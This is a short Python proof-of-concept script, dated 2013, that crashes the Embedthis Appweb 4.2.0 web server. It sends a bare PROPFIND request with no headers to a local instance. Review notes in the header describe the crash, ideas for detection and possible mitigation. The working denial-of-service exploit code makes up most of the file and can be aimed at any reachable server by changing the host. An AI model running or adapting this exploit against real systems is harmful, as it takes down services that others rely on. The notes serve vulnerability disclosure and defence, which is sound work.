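#!c:\python27\python.exe
#
# Embedthis Appweb 4.2.0-0
# 0Day DoS POC by John Cobb - www.NoBytes.com - 2013-02-16 - [v1.0]
# Tested on WinXP SP3 32bit
#
# !exploitable
# Exploitability Classification: UNKNOWN
# Recommended Bug Title: Data from Faulting Address controls Branch Selection
#   starting at libmpr!mprSeekFile+0x000000000000000f (Hash=0x0c566765.0x0c1b6765)
# The data from the faulting address is later used to determine whether or not
# a branch is taken.
#
# Review notes:
# - What is sent: a single PROPFIND request line followed by CRLF CRLF, i.e. an
#   HTTP/1.1 request with an empty header block (no Host header, no body).
# - Impact shown here: a crash of the server process (denial of service). The
#   !exploitable output above classifies exploitability as UNKNOWN and places
#   the fault in libmpr!mprSeekFile; the root cause is not stated in this file.
# - Detection: HTTP/1.1 requires a Host header, so a PROPFIND request without
#   one is unusual for legitimate WebDAV clients. Alerting on that pattern in
#   access logs or at a proxy, and on unexpected exits or restarts of the Appweb
#   process, should surface attempts (presumably; tune against your own traffic).
# - Mitigation: move to a vendor release that fixes this crash (fixed version
#   not given here; check the vendor changelog). If WebDAV is not needed,
#   rejecting PROPFIND at a front-end proxy removes the exposure.

import socket

# Target is the loopback interface: the author tested against a local instance.
host = '127.0.0.1'
port = 80

# Request line only; the trailing CRLF CRLF ends the request line and closes an
# empty header section in one go.
request = "PROPFIND /index.html HTTP/1.1"
crash = "\x0d\x0a\x0d\x0a"
packet = request + crash

# NOTE: written for the Python 2.7 interpreter named in the shebang, where a
# str literal is a byte string and can be passed to sendall() directly.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    # Bound the connect/send so the script cannot hang on an unresponsive host.
    s.settimeout(10)
    s.connect((host, port))
    s.sendall(packet)
finally:
    # Always release the socket, including when connect() or sendall() raises.
    s.close()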